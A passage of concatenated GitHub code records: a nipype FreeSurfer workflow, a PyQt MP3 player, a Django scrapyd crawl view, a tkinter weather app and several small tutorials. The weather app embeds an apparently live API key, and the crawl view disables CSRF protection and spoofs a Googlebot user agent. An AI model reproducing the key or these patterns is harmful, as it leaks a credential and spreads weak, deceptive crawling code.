str(kilometry) + \"\\'\" + \", \" + \"\\'\" + start_time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"\\'\" + \", \" + \"\\'\" + end_time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"\\'\" + \", \" + \"\\'\" + str(status_platnosci) + \"\\'\" + \");\\n\"\n\t\t\t\t\t\tfaktury.write(to_insert)\n\t\t\t\t\t\t\n\t\t\t\t\t\tCI_created = CI_created + 1\t\t\t\t\n\t\t\t\t\t\ttime_for_driver = end_time\n\t\t\t\t\t\t\n\t\t\t\t\t\tif (CI_created >= t1_size):\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\trejestracja_samochodu = rejestracjetable[driver].replace(\"\\n\", \"\")\n\t\t\t\t\tkierowca = kierowcytable[driver].replace(\"\\n\", \"\")\n\t\t\t\t\tarkusz_3.write(period_time_start.strftime(\"%d.%m.%Y %H:%M\") + \"; \" + period_time_end.strftime(\"%d.%m.%Y %H:%M\") + \"; \" + rejestracja_samochodu + \"; \" + kierowca + \"\\n\")\n\t\t\t\t\tif (CI_created >= t1_size):\n\t\t\t\t\t\tbreak\n\t\t\t\tif (CI_created >= t1_size):\n\t\t\t\t\tbreak\n\t\t\t\ttime_for_driver_main = period_time_end_main\n","repo_name":"amadeusz-chmielowski/generatot_danych","sub_path":"insert_faktury.py","file_name":"insert_faktury.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"5710276120","text":"# NOTE\n# We cannot directly perform any operation on a tuple as its immutable. In order to do it, we convert the tuple to a list\n# we perform wtv tf we wanna in the list and then convert the list back to the tuple\n# Flowchart: Tuple -> List -> Some functions on the list. Updated list -> Tuple\n# Example:\n\ncountries_i_wanna_visit = (\"Japan\", \"South Korea\", \"USA\", \"UK (again)\", \"Greece\", \"Phillippines\")\ntemp = list(countries_i_wanna_visit)\ntemp.append(\"Germany\")\ntemp.pop(countries_i_wanna_visit.index(\"Greece\")) # Removes Greece cuz it not that cool :/ Greece was boring..\ncountries_i_wanna_visit = tuple(temp)\nprint(countries_i_wanna_visit)\n\n\n# NOTE we can concatenate 2 tuples without converting them to lists.\ntuple1 = (1, 2)\ntuple2 = (3, 4)\ntuple3 = tuple1 + tuple2\nprint(tuple3)\n\n\n\n# NOTE some important tuple functions (they work without converting the tuple to lists)\n# count() - yk wat it does\n# index() - again yk wat it does\n# \n","repo_name":"rishav-the-kami/python-100-days-tutorial","sub_path":"Day24 (Tuple Operations)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"42209799451","text":"# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nSurface extraction\n++++++++++++++++++\n\nDefines the workflows for extracting surfaces from segmentations\n\n\n\"\"\"\nimport nipype.pipeline.engine as pe # pipeline engine\nfrom nipype.interfaces import utility as niu # utility\nfrom nipype.interfaces import io as nio # i/o\nfrom nipype.interfaces import freesurfer as fs # Freesurfer\nfrom ..interfaces import (\n Binarize, NormalizeSurf, FillMask, AsegAddOuter, ApplyLTATransform\n)\n\n\ndef extract_surfs_fs_wf(name='extract_surfs_fs_wf'):\n \"\"\"\n This workflow extracts GIFTI sorfaces from a FreeSurfer subjects directory\n and projects them onto a target space.\n\n .. workflow::\n :graph2use: orig\n :simple_form: yes\n from regseg.workflows.surf import extract_surfs_fs_wf\n wf = extract_surfs_fs_wf()\n\n **Inputs**\n subjects_dir\n FreeSurfer SUBJECTS_DIR\n subject_id\n FreeSurfer subject ID\n t1_preproc\n The T1w preprocessed image (the co-registration target for\n bbr/bbregister)\n target_to_t1_lta\n A target-to-T1w affine transform, in LTA format.\n\n **Outputs**\n out_surf\n GIFTI surfaces, in target space\n \"\"\"\n workflow = pe.Workflow(name=name)\n\n inputnode = pe.Node(niu.IdentityInterface([\n 'subjects_dir', 'subject_id', 't1_preproc', 'xform_trg2t1']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(['out_surf']), name='outputnode')\n\n get_fs = pe.Node(nio.FreeSurferSource(), name='get_fs')\n exsurfs = extract_surfaces(normalize=False, use_ras_coord=False, brainmask=True)\n exsurfs.inputs.inputnode.model_name = 'boldsimple'\n\n tkreg = pe.Node(fs.Tkregister2(reg_file='native2fs.dat', noedit=True,\n reg_header=True), name='tkregister2')\n\n def _format_subid(sub_id):\n return '--subject %s' % sub_id\n lta_conv = pe.Node(fs.utils.LTAConvert(out_lta=True), 'lta_convert')\n lta_concat = pe.Node(fs.preprocess.ConcatenateLTA(out_type='RAS2RAS'), name='lta_concat')\n lta_xfm = pe.MapNode(ApplyLTATransform(), iterfield=['in_file'], name='lta_xfm')\n\n workflow.connect([\n (inputnode, get_fs, [('subjects_dir', 'subjects_dir'),\n ('subject_id', 'subject_id')]),\n (inputnode, tkreg, [('t1_preproc', 'moving_image'),\n ('subject_id', 'subject_id')]),\n (inputnode, lta_conv, [('t1_preproc', 'source_file'),\n (('subject_id', _format_subid), 'args')]),\n (inputnode, lta_concat, [('subjects_dir', 'subjects_dir'),\n ('subject_id', 'subject'),\n ('xform_trg2t1', 'in_lta1')]),\n (get_fs, exsurfs, [('aseg', 'inputnode.aseg'),\n ('norm', 'inputnode.norm'),\n ('brainmask', 'inputnode.brainmask')]),\n (get_fs, tkreg, [('orig', 'target_image')]),\n (tkreg, lta_conv, [('reg_file', 'in_reg')]),\n (get_fs, lta_conv, [('orig', 'target_file')]),\n (lta_conv, lta_concat, [('out_lta', 'in_lta2')]),\n (lta_concat, lta_xfm, [('out_file', 'transform_file')]),\n (exsurfs, lta_xfm, [('outputnode.out_surf', 'in_file')]),\n (lta_xfm, outputnode, [('out_file', 'out_surf')]),\n ])\n\n return workflow\n\n\ndef mask2surf(name='MaskToSurface', use_ras_coord=True):\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['in_file', 'norm', 'in_filled', 'out_name']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(fields=['out_surf']), name='outputnode')\n binarize = pe.Node(fs.Binarize(min=0.1), name='binarize')\n fill = pe.Node(FillMask(), name='FillMask')\n pretess = pe.Node(fs.MRIPretess(label=1), name='PreTess')\n tess = pe.Node(fs.MRITessellate(label_value=1, use_real_RAS_coordinates=use_ras_coord),\n name='tess')\n smooth = pe.Node(fs.SmoothTessellation(disable_estimates=True),\n name='mris_smooth')\n rename = pe.Node(niu.Rename(keep_ext=False), name='rename')\n togii = pe.Node(fs.MRIsConvert(out_datatype='gii'), name='toGIFTI')\n\n wf = pe.Workflow(name=name)\n wf.connect([\n (inputnode, binarize, [('in_file', 'in_file')]),\n (inputnode, pretess, [('norm', 'in_norm')]),\n (inputnode, fill, [('in_filled', 'in_filled')]),\n (inputnode, rename, [('out_name', 'format_string')]),\n (binarize, fill, [('binary_file', 'in_file')]),\n (fill, pretess, [('out_file', 'in_filled')]),\n (pretess, tess, [('out_file', 'in_file')]),\n (tess, smooth, [('surface', 'in_file')]),\n (smooth, rename, [('surface', 'in_file')]),\n (rename, togii, [('out_file', 'in_file')]),\n (togii, outputnode, [('converted', 'out_surf')]),\n ])\n return wf\n\n\ndef extract_surfaces(name='GenSurface', normalize=True, use_ras_coord=True,\n brainmask=False):\n \"\"\"\n A nipype workflow for surface extraction from ``labels`` in a segmentation.\n\n .. note :: References used to implement this code:\n\n * \n * \n * \n * \n \"\"\"\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['aseg', 'norm', 'in_filled', 'brainmask', 't1_2_fsnative_invxfm', 'model_name'],\n mandatory_inputs=False),\n name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_surf', 'out_binary']), name='outputnode')\n\n surfnode = pe.Node(niu.IdentityInterface(fields=['out_surf']), name='surfnode')\n\n get_mod = pe.Node(niu.Function(function=_read_model, output_names=['name', 'labels']),\n name='GetModel')\n\n binarize = pe.MapNode(Binarize(), name='BinarizeLabels',\n iterfield=['match'])\n\n fill = pe.MapNode(FillMask(), name='FillMask', iterfield=['in_file'])\n pretess = pe.MapNode(fs.MRIPretess(label=1), name='PreTess',\n iterfield=['in_filled'])\n tess = pe.MapNode(fs.MRITessellate(label_value=1, use_real_RAS_coordinates=use_ras_coord),\n name='tess', iterfield=['in_file'])\n smooth = pe.MapNode(fs.SmoothTessellation(disable_estimates=True),\n name='mris_smooth', iterfield=['in_file'])\n rename = pe.MapNode(niu.Rename(keep_ext=False),\n name='rename', iterfield=['in_file', 'format_string'])\n\n togii = pe.MapNode(fs.MRIsConvert(out_datatype='gii'),\n iterfield='in_file', name='toGIFTI')\n\n wf = pe.Workflow(name=name)\n wf.connect([\n (inputnode, get_mod, [('model_name', 'model_name')]),\n (inputnode, binarize, [('aseg', 'in_file')]),\n (get_mod, binarize, [('labels', 'match')]),\n (inputnode, pretess, [('norm', 'in_norm')]),\n (inputnode, fill, [('in_filled', 'in_filled')]),\n (binarize, fill, [('out_file', 'in_file')]),\n (fill, pretess, [('out_file', 'in_filled')]),\n (pretess, tess, [('out_file', 'in_file')]),\n (tess, smooth, [('surface', 'in_file')]),\n (smooth, rename, [('surface', 'in_file')]),\n (get_mod, rename, [('name', 'format_string')]),\n (rename, togii, [('out_file', 'in_file')]),\n (fill, outputnode, [('out_file', 'out_binary')]),\n ])\n\n if brainmask:\n bmsk_wf = mask2surf(use_ras_coord=use_ras_coord)\n bmsk_wf.inputs.inputnode.out_name = 'brain.surf'\n merge = pe.Node(niu.Merge(2), name='mergebmask')\n wf.connect([\n (inputnode, bmsk_wf, [('brainmask', 'inputnode.in_file'),\n ('norm', 'inputnode.norm'),\n ('in_filled', 'inputnode.in_filled')]),\n (togii, merge, [('converted', 'in1')]),\n (bmsk_wf, merge, [('outputnode.out_surf', 'in2')]),\n (merge, surfnode, [('out', 'out_surf')]),\n ])\n else:\n wf.connect(togii, 'converted', surfnode, 'out_surf')\n\n if normalize:\n fixgii = pe.MapNode(NormalizeSurf(), iterfield='in_file', name='fixGIFTI')\n wf.connect([\n (inputnode, fixgii, [('t1_2_fsnative_invxfm', 'transform_file')]),\n (surfnode, fixgii, [('out_surf', 'in_file')]),\n (fixgii, outputnode, [('out_file', 'out_surf')]),\n ])\n else:\n wf.connect([\n (surfnode, outputnode, [('out_surf', 'out_surf')]),\n ])\n\n return wf\n\n\ndef extract_surfaces_model(model='bold', name='Surfaces', gen_outer=True):\n \"\"\"Extracts surfaces as prescribed by the model ``model``\"\"\"\n\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['aseg', 'norm', 'brainmask', 't1_2_fsnative_invxfm']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_surf']), name='outputnode')\n\n exsurfs = extract_surfaces()\n exsurfs.inputs.inputnode.model_name = model\n\n wf = pe.Workflow(name=name)\n wf.connect([\n (inputnode, exsurfs, [('norm', 'inputnode.norm'),\n ('t1_2_fsnative_invxfm', 'inputnode.t1_2_fsnative_invxfm')]),\n (exsurfs, outputnode, [('outputnode.out_surf', 'out_surf')]),\n ])\n\n if gen_outer:\n addmsk = pe.Node(AsegAddOuter(), name='addmsk')\n wf.connect([\n (inputnode, addmsk, [('aseg', 'in_file'),\n ('brainmask', 'in_mask')]),\n (addmsk, exsurfs, [('out_file', 'inputnode.aseg')]),\n ])\n else:\n wf.connect([\n (inputnode, exsurfs, [('aseg', 'inputnode.aseg')]),\n ])\n\n return wf\n\n\ndef _read_model(model_name):\n from sys import version_info\n import simplejson as json\n from pkg_resources import resource_filename as pkgrf\n\n with open(pkgrf('regseg', 'data/model_%s.json' % model_name.lower()),\n 'rb' if version_info[0] < 3 else 'r') as sfh:\n model = json.load(sfh)\n\n name = ['%s.surf' % m for m in model.keys()]\n labels = list(model.values())\n\n return name, labels\n","repo_name":"oesteban/regseg-2","sub_path":"regseg/workflows/surf.py","file_name":"surf.py","file_ext":"py","file_size_in_byte":10407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31757772169","text":"import os\nfrom mp3 import Mp3Info\n\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PyQt5.QtCore import Qt, QUrl, QSize, QThread\nfrom PyQt5.QtGui import QIcon, QPalette\nfrom PyQt5.QtWidgets import QMessageBox, QMainWindow, QScrollArea, QAction, \\\n QLabel, QFileDialog, QVBoxLayout, QHBoxLayout, QWidget, QListWidget, \\\n QPushButton, QSlider, QAbstractItemView, QTableWidget, QTableWidgetItem\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, file_name=None):\n super().__init__()\n self.setMinimumSize(850, 550)\n self.main_widget = MainWidget(self, file_name)\n self.setCentralWidget(self.main_widget)\n self.init_ui()\n\n def init_ui(self):\n opening = QAction('Open', self)\n opening.setShortcut('Ctrl+O')\n opening.triggered.connect(self.main_widget.request_mp3_file)\n\n menu_bar = self.menuBar()\n file_open = menu_bar.addMenu('&Open')\n file_open.addAction(opening)\n\n self.setWindowTitle('MP3')\n self.setWindowIcon(QIcon('logo.png'))\n self.show()\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Exit', \"Are you sure to exit?\",\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n\n event.accept() if reply == QMessageBox.Yes else event.ignore()\n\n\nclass MainWidget(QWidget):\n def __init__(self, main_window, file_name):\n super().__init__(main_window)\n self.main_window = main_window\n self.current_file = os.path.abspath(file_name) if \\\n file_name is not None else None\n self.track_name = TrackName(self)\n self.player_window = PlayerWindow(self)\n self.mp3_info_window = Mp3InfoWindow(self)\n self.current_file_screen = CurrentFileScreen(self)\n self.hex_table = HexTable(self)\n self.byte_info_screen = ByteInfoScreen(self)\n self.init_ui()\n\n def init_ui(self):\n main_vlayout = QVBoxLayout()\n main_hlayout = QHBoxLayout()\n\n v1_layout = QVBoxLayout()\n v1_layout.addWidget(self.track_name)\n v1_layout.addWidget(self.player_window)\n v1_layout.addWidget(self.mp3_info_window)\n\n v2_layout = QVBoxLayout()\n v2_layout.addWidget(self.byte_info_screen)\n v2_layout.addWidget(self.hex_table)\n\n main_hlayout.addLayout(v1_layout)\n main_hlayout.addLayout(v2_layout)\n\n main_vlayout.addLayout(main_hlayout)\n main_vlayout.addWidget(self.current_file_screen)\n self.setLayout(main_vlayout)\n\n def request_mp3_file(self):\n file_name, _ = QFileDialog.getOpenFileName(self, 'Open File',\n filter='MP3 Music (*.mp3)')\n self.open_mp3_file(file_name)\n\n def open_mp3_file(self, file_name):\n if file_name == '':\n return\n\n cur_dir = os.path.dirname(file_name)\n prev_dir = os.path.dirname(self.current_file) if \\\n self.current_file is not None else None\n\n self.current_file = file_name\n self.current_file_screen.update()\n self.player_window.stop()\n self.mp3_info_window.mp3_info_list.clear()\n if not cur_dir == prev_dir:\n self.player_window.set_list_of_all_mp3_files_in_current_dir()\n\n if self.hex_table.filler is not None and \\\n self.hex_table.filler.isRunning():\n self.hex_table.filler.terminate()\n\n try:\n self.track_name.update()\n self.mp3_info_window.update()\n self.hex_table.create_table()\n except AttributeError as e:\n self.mp3_info_window.mp3_info_list.addItem(e.args[0])\n\n def get_mp3_info(self):\n return self.mp3_info_window.mp3_info\n\n\nclass ByteInfoScreen(QLabel):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.setFixedHeight(40)\n\n def update(self, text):\n self.setText(text)\n\n\nclass TableFiller(QThread):\n def __init__(self, fill_table):\n super().__init__()\n self.fill_table = fill_table\n\n def run(self):\n self.fill_table()\n\n\nclass HexTable(QScrollArea):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.main_widget = main_widget\n self.mp3_info = None\n self.filler = None\n self.table = QTableWidget()\n self.setWidgetResizable(True)\n self.setWidget(self.table)\n\n def create_table(self):\n self.mp3_info = self.main_widget.get_mp3_info()\n self.filler = TableFiller(self.fill_table)\n self.filler.start()\n\n self.table.cellClicked.connect(self.write_byte_info)\n\n def fill_table(self):\n with open(self.mp3_info.filename, 'rb') as file:\n byte_count = len(file.read())\n file.seek(0)\n row_count = byte_count // 16 + 1\n\n self.table.setRowCount(row_count)\n self.table.setColumnCount(16)\n self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)\n for row in range(row_count):\n for column in range(16):\n item = QTableWidgetItem()\n text = file.read(1).hex()\n item.setTextAlignment(Qt.AlignCenter)\n item.setText(text)\n self.table.setItem(row, column, item)\n\n def write_byte_info(self, row, column):\n self.main_widget.byte_info_screen.update('{}, {}'.format(row, column))\n\n\nclass TrackName(QLabel):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.main_widget = main_widget\n self.setAlignment(Qt.AlignCenter)\n\n def update(self):\n filename = '' if self.main_widget.current_file is None else \\\n os.path.basename(self.main_widget.current_file)[:-4]\n self.setText(filename)\n\n\nclass PlayerWindow(QWidget):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.main_widget = main_widget\n self.mp3_files = []\n self.played = False\n self.is_pause = False\n self.player = QMediaPlayer()\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignCenter)\n self.init_ui()\n\n def init_ui(self):\n previous_file = QPushButton(QIcon('pictures/prev.png'), '', self)\n previous_file.setFixedSize(56, 34)\n previous_file.setIconSize(QSize(40, 24))\n\n rewind = QPushButton(QIcon('pictures/rewind.png'), '', self)\n rewind.setFixedSize(56, 34)\n rewind.setIconSize(QSize(40, 24))\n\n play = QPushButton(QIcon('pictures/play.png'), '', self)\n play.setFixedSize(56, 34)\n play.setIconSize(QSize(40, 24))\n\n forward = QPushButton(QIcon('pictures/forward.png'), '', self)\n forward.setFixedSize(56, 34)\n forward.setIconSize(QSize(40, 24))\n\n next_file = QPushButton(QIcon('pictures/next.png'), '', self)\n next_file.setFixedSize(56, 34)\n next_file.setIconSize(QSize(40, 24))\n\n previous_file.clicked.connect(self.open_previous_file)\n play.clicked.connect(self.play_or_pause)\n next_file.clicked.connect(self.open_next_file)\n\n volume_slider = QSlider(Qt.Horizontal)\n volume_slider.setFixedWidth(100)\n volume_slider.setValue(50)\n volume_slider.valueChanged.connect(self.change_volume)\n\n self.layout.addWidget(previous_file)\n self.layout.addWidget(rewind)\n self.layout.addWidget(play)\n self.layout.addWidget(forward)\n self.layout.addWidget(next_file)\n self.layout.addWidget(volume_slider)\n\n self.setLayout(self.layout)\n\n def change_volume(self, volume):\n self.player.setVolume(volume)\n\n def play_or_pause(self):\n if self.is_pause:\n self.play()\n elif not self.played:\n self.start_play()\n else:\n self.pause()\n\n def play(self):\n self.player.play()\n self.played = True\n self.is_pause = False\n\n def pause(self):\n self.player.pause()\n self.is_pause = True\n\n def stop(self):\n self.player.stop()\n self.played = False\n self.is_pause = False\n\n def start_play(self):\n file = self.main_widget.current_file\n if file is not None:\n self.player.setMedia(QMediaContent(QUrl.fromLocalFile(file)))\n self.played = True\n self.play()\n\n def open_next_file(self):\n if self.played:\n self.stop()\n\n if self.main_widget.current_file is not None:\n cur_file_index = self.mp3_files.index(self.main_widget.current_file)\n\n if cur_file_index == len(self.mp3_files) - 1:\n cur_file_index = -1\n\n self.main_widget.open_mp3_file(self.mp3_files[cur_file_index + 1])\n\n def open_previous_file(self):\n if self.played:\n self.stop()\n\n if self.main_widget.current_file is not None:\n cur_file_index = self.mp3_files.index(self.main_widget.current_file)\n self.main_widget.open_mp3_file(self.mp3_files[cur_file_index - 1])\n\n def set_list_of_all_mp3_files_in_current_dir(self):\n current_file = self.main_widget.current_file\n current_dir = os.path.dirname(current_file)\n all_files = os.listdir(current_dir)\n self.mp3_files = [current_dir + '/' + file for file in all_files\n if file[-4:] == '.mp3']\n\n\nclass Mp3InfoWindow(QScrollArea):\n def __init__(self, main_window):\n super().__init__(main_window)\n self.main_window = main_window\n self.mp3_info = None\n self.mp3_info_list = QListWidget()\n self.setBackgroundRole(QPalette.Light)\n self.update()\n self.setWidgetResizable(True)\n self.setWidget(self.mp3_info_list)\n\n def update(self):\n if self.main_window.current_file is not None:\n self.mp3_info = Mp3Info(self.main_window.current_file)\n self.mp3_info_list.addItems(str(self.mp3_info).split('\\n'))\n\n\nclass CurrentFileScreen(QLabel):\n def __init__(self, main_window):\n super().__init__(main_window)\n self.main_window = main_window\n self.update()\n\n def update(self, *__args):\n text = 'File path: {}'.format(self.main_window.current_file)\n self.setToolTip(text)\n self.setText(text)\n","repo_name":"alexSatov/univer-python","sub_path":"MP3/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":10377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16646401352","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('book', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='books',\n options={'verbose_name_plural': '书籍', 'verbose_name': '书籍'},\n ),\n migrations.AlterField(\n model_name='books',\n name='type_id',\n field=models.SmallIntegerField(choices=[('JAVASCRIPT', 'javascript'), ('DATABASE', '数据库'), ('OPERATINGSYSTEM', '操作系统'), ('PYTHON', 'python'), ('ALGORITHMS', '数据结构与算法'), ('MACHINELEARNING', '机器学习')], default=1, verbose_name='商品种类'),\n ),\n ]\n","repo_name":"wuyumeng/bookstore","sub_path":"bookstore/book/migrations/0002_auto_20180402_2344.py","file_name":"0002_auto_20180402_2344.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"15723817259","text":"from uuid import uuid4\nfrom urllib.parse import urlparse\nfrom django.core.validators import URLValidator\nfrom django.core.exceptions import ValidationError\nfrom django.views.decorators.http import require_POST, require_http_methods\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom scrapyd_api import ScrapydAPI\nfrom main.utils import URLUtil\nfrom main.models import ScrapyItem\n\n# connect scrapyd service\nscrapyd = ScrapydAPI('http://localhost:6800')\n\n\ndef is_valid_url(url):\n validate = URLValidator()\n try:\n validate(url) # check if url format is valid\n except ValidationError:\n return False\n\n return True\n\n\n@csrf_exempt\n@require_http_methods(['POST', 'GET']) # only get and post\ndef crawl(request):\n # Post requests are for new crawling tasks\n if request.method == 'POST':\n\n url = request.POST.get('url', None) # take url comes from client. (From an input may be?)\n\n if not url:\n return JsonResponse({'error': 'Missing args'})\n\n if not is_valid_url(url):\n return JsonResponse({'error': 'URL is invalid'})\n\n domain = urlparse(url).netloc # parse the url and extract the domain\n unique_id = str(uuid4()) # create a unique ID.\n\n # This is the custom settings for scrapy spider.\n # We can send anything we want to use it inside spiders and pipelines.\n # I mean, anything\n settings = {\n 'unique_id': unique_id, # unique ID for each record for DB\n 'USER_AGENT': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'\n }\n\n # Here we schedule a new crawling task from scrapyd.\n # Notice that settings is a special argument name.\n # But we can pass other arguments, though.\n # This returns a ID which belongs and will be belong to this task\n # We are goint to use that to check task's status.\n task = scrapyd.schedule('default', 'icrawler',\n settings=settings, url=url, domain=domain)\n\n return JsonResponse({'task_id': task, 'unique_id': unique_id, 'status': 'started'})\n\n # Get requests are for getting result of a specific crawling task\n elif request.method == 'GET':\n # We were passed these from past request above. Remember ?\n # They were trying to survive in client side.\n # Now they are here again, thankfully. <3\n # We passed them back to here to check the status of crawling\n # And if crawling is completed, we respond back with a crawled data.\n task_id = request.GET.get('task_id', None)\n unique_id = request.GET.get('unique_id', None)\n\n if not task_id or not unique_id:\n return JsonResponse({'error': 'Missing args'})\n\n # Here we check status of crawling that just started a few seconds ago.\n # If it is finished, we can query from database and get results\n # If it is not finished we can return active status\n # Possible results are -> pending, running, finished\n status = scrapyd.job_status('default', task_id)\n if status == 'finished':\n try:\n # this is the unique_id that we created even before crawling started.\n item = ScrapyItem.objects.get(unique_id=unique_id)\n return JsonResponse({'data': item.to_dict['data']})\n except Exception as e:\n return JsonResponse({'error': str(e)})\n else:\n return JsonResponse({'status': status})","repo_name":"adriancast/Scrapyd-Django-Template","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"33"} +{"seq_id":"30410786859","text":"# Example 3-38. Option B: add the executor future to the gathered tasks\nimport time\nimport asyncio\n\n\n# This utility function make_coro() simply waits for the future to complete—\n# but crucially, it continues to wait for the future even inside the exception\n# handler for CancelledError.\nasync def make_coro(future):\n try:\n return await future\n except asyncio.CancelledError:\n return await future\n\n\nasync def main():\n loop = asyncio.get_running_loop()\n future = loop.run_in_executor(None, blocking)\n # We take the future returned from the run_in_executor() call and pass it\n # into a new utility function, make_coro(). The important point here is\n # that we’re using create_task(), which means that this task will appear\n # in the list of all_tasks() within the shutdown handling of\n # asyncio.run(), and will receive a cancellation during the shutdown\n # process.\n asyncio.create_task(make_coro(future))\n print(f'{time.ctime()} Hello!')\n await asyncio.sleep(1.0)\n print(f'{time.ctime()} Goodbye!')\n\n\ndef blocking():\n time.sleep(2.0)\n print(f\"{time.ctime()} Hello from a thread!\")\n\n\ntry:\n asyncio.run(main())\nexcept KeyboardInterrupt:\n print('Bye!')\n","repo_name":"ckarageorgkaneen/usingaio","sub_path":"chapter3/38/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"33"} +{"seq_id":"1440369181","text":"#! /usr/bin/env python3\nimport random\n\n\ndef main():\n\n # define lists for dictionary construction\n english_words = [\n \"sir\", \"hotel\", \"student\", \"boy\", \"madam\", \"professor\", \"restaurant\", \"your\", \"excuse\",\n \"students\", \"are\", \"lawyer\", \"the\", \"restroom\", \"my\", \"hello\", \"is\", \"man\"\n ]\n \n pirate_words = [\n \"matey\", \"fleabag inn\", \"swabbie\", \"matey\", \"proud beauty\", \"foul blaggart\", \"galley\", \"yer\", \"arr\",\n \"swabbies\", \"be\", \"foul blaggart\", \"th'\", \"head\", \"me\", \"avast\", \"be\", \"matey\"\n ]\n \n # intro + showing of translatable words\n print(\"This is a translator for pirate language.\")\n print(\"Current supported words are:\")\n sample = random.sample(english_words, 6)\n for i in sample: print(i)\n\n # get word to translate and construct dictionary.\n str_to_translate = input(\"Please enter a phrase to translate.\\n\").split(\" \")\n translate_dict = {english:pirate for (english, pirate) in zip(english_words, pirate_words)}\n\n # process translation\n output_dir = []\n for i in str_to_translate:\n if translate_dict.get(i) is not None:\n output_dir.append(translate_dict[i])\n else:\n output_dir.append(i)\n \n # output\n print(output_dir)\n print(f\"Translated string is: {' '.join(output_dir)}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"KCNOSU29K3/CSE-INTERMEDIATE","sub_path":"mod-3/Lesson_2/pirate.py","file_name":"pirate.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36544441470","text":"import tkinter as tk\r\nfrom tkinter import font\r\nimport requests\r\n\r\ndegree_sign = u\"\\N{DEGREE SIGN}\"\r\n\r\ndef format_response(weather):\r\n try:\r\n name, code = weather[\"name\"], weather[\"sys\"][\"country\"]\r\n desc = weather[\"weather\"][0][\"description\"]\r\n temp = weather[\"main\"][\"temp\"]\r\n\r\n final_str = f\"City: {name}, {code}\\nConditions: {desc}\\nTemperature ({degree_sign}C): {temp} \"\r\n except:\r\n final_str = \"There was a problem\\nretrieving that information\"\r\n\r\n return final_str\r\ndef get_weather(city):\r\n weather_key = \"536e97816398ceb705c3fef5a5e262fd\"\r\n url = \"http://api.openweathermap.org/data/2.5/weather\"\r\n params = {\"APPID\": weather_key, \"q\": city, \"units\": \"metric\"}\r\n response = requests.get(url, params=params)\r\n weather = response.json()\r\n\r\n results[\"text\"] = format_response((weather))\r\n\r\n\r\nHEIGHT = 500\r\nWIDTH = 600\r\n\r\n# every tkinter has a root window\r\nroot = tk.Tk()\r\n\r\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\r\ncanvas.pack()\r\n\r\nbackground_image = tk.PhotoImage(file=\"landscape.png\")\r\nbackground_label = tk.Label(root, image=background_image)\r\nbackground_label.place(relwidth=1, relheight=1)\r\n\r\n# upper frame smaller one on top\r\nframe = tk.Frame(root, bg=\"#80c1ff\", bd=5)\r\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.1, anchor=\"n\")\r\n\r\nentry = tk.Entry(frame, font=(\"Courier\", 18))\r\nentry.place(relwidth=0.65, relheight=1)\r\n\r\nbutton = tk.Button(frame, text=\"Get Weather\", font=(\"Courier\", 12), command=lambda: get_weather(entry.get()))\r\nbutton.place(relx=0.7, relheight=1, relwidth=0.3)\r\n\r\n# lower frame\r\n\r\nlower_frame = tk.Frame(root, bg=\"#80c1ff\", bd=5)\r\nlower_frame.place(relx=0.5, rely=0.25, relwidth=0.75, relheight=0.6, anchor=\"n\")\r\n\r\nresults = tk.Label(lower_frame, font=(\"Courier\", 14), anchor=\"nw\", justify=\"left\", bd=4)\r\nresults.place(relwidth=1, relheight=1)\r\n\r\n# every application goes in between the root.mainloop() and root = tl.Tk()\r\nroot.mainloop()\r\n","repo_name":"balrajjutte/WeatherApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10371674901","text":"\"\"\"feedit URL 